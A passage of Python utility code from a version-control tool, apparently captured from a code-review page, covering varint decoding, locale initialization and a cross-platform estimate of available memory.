    # Groups arrive least-significant first, 7 bits per byte.
    for shift in itertools.count(0, 7):
        byte = ord(readexactly(fh, 1))
        value |= (byte & 0x7F) << shift
        if byte < 0x80:
            # continuation bit clear: this was the final group
            return value
3600 3600
3601 3601
3602 3602 # Passing the '' locale means that the locale should be set according to the
3603 3603 # user settings (environment variables).
3604 3604 # Python sometimes avoids setting the global locale settings. When interfacing
3605 3605 # with C code (e.g. the curses module or the Subversion bindings), the global
3606 3606 # locale settings must be initialized correctly. Python 2 does not initialize
3607 3607 # the global locale settings on interpreter startup. Python 3 sometimes
3608 3608 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3609 3609 # explicitly initialize it to get consistent behavior if it's not already
3610 3610 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3611 3611 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3612 3612 # if we can remove this code.
@contextlib.contextmanager
def with_lc_ctype():
    """Temporarily initialize LC_CTYPE from the environment if it is still
    the interpreter-default 'C' locale; restore it on exit."""
    previous = locale.setlocale(locale.LC_CTYPE, None)
    if previous != 'C':
        # Already initialized; nothing to change.
        yield
        return
    try:
        try:
            locale.setlocale(locale.LC_CTYPE, '')
        except locale.Error:
            # The likely case is that the locale from the environment
            # variables is unknown.
            pass
        yield
    finally:
        locale.setlocale(locale.LC_CTYPE, previous)
3629
3630
def _estimatememory():
    """Provide an estimate for the available system memory in Bytes.

    If no estimate can be provided on the platform, returns None.
    """
    if pycompat.sysplatform.startswith(b'win'):
        # On Windows, use the GlobalMemoryStatusEx kernel function directly.
        # BUGFIX: Structure, byref, sizeof and windll live in the ctypes
        # module itself, not in ctypes.wintypes — importing them from
        # ctypes.wintypes raises ImportError and made this function crash
        # on Windows.
        from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
        from ctypes import Structure, byref, sizeof, windll

        class MEMORYSTATUSEX(Structure):
            # Field layout per the Win32 MEMORYSTATUSEX documentation.
            _fields_ = [
                ('dwLength', DWORD),
                ('dwMemoryLoad', DWORD),
                ('ullTotalPhys', DWORDLONG),
                ('ullAvailPhys', DWORDLONG),
                ('ullTotalPageFile', DWORDLONG),
                ('ullAvailPageFile', DWORDLONG),
                ('ullTotalVirtual', DWORDLONG),
                ('ullAvailVirtual', DWORDLONG),
                ('ullExtendedVirtual', DWORDLONG),
            ]

        x = MEMORYSTATUSEX()
        # dwLength must be set to the structure size before the call.
        x.dwLength = sizeof(x)
        windll.kernel32.GlobalMemoryStatusEx(byref(x))
        return x.ullAvailPhys

    # On newer Unix-like systems and Mac OSX, the sysconf interface
    # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
    # seems to be implemented on most systems.
    try:
        pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
        pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
        return pagesize * pages
    except OSError:  # sysconf can fail
        pass
    except KeyError:  # unknown parameter
        pass
General Comments 0
You need to be logged in to leave comments. Login now